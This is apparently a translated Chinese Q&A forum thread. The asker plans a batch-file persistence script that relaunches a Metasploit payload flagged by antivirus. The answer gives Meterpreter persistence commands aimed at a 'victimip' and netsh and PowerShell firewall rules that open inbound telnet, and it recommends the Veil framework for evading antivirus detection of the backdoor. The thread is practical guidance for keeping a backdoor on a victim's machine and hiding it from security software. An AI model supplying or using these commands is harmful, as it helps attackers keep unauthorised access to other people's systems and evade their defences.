我正在尝试为 Metasploit 设计一个简单的持久性脚本,考虑到他们拥有的那个被防病毒标记。我遇到了一些关于代码应该是什么样子的麻烦。这是我的计划: 1. 带有循环功能的启动文件夹中的批处理文件 2. 所述批处理文件执行任务列表命令并在正在运行的进程中搜索文件的名称 3. 如果找到正在运行的进程,它什么也不做 4. 如果它看不到进程正在运行,它只是再次启动它这是非常简单的设计,但是当我编写代码时遇到了麻烦。我的问题是:如何将这个想法写成命令?这个想法是 if 语句如何影响 tasklist 命令。所以我需要对tasklist命令进行过滤,根据名字查看进程是否在运行,
问问题
310 次
1 回答
0
Metasploit 附带默认的辅助模块。在您的场景中,您可以使用执行
run metsvc在meterprerter上。或者
run persistence -U -i <interactive seconds > -p portnumber -r victimip
您还可以使用创建规则netsh
netsh advfirewall firewall add rule name="Allow Inbound Telnet" dir=in program= %SystemRoot%\System32\tlntsvr.exe remoteip=localsubnet action=allow
使用 Powershell
New-NetFirewallRule -DisplayName “Allow Inbound Telnet” -Direction Inbound -Program %SystemRoot%\System32\tlntsvr.exe -RemoteAddress LocalSubnet -Action Allow
如果有任何 AV 检测到您的后门,请使用veil 框架
于 2015-06-09T05:51:59.760 回答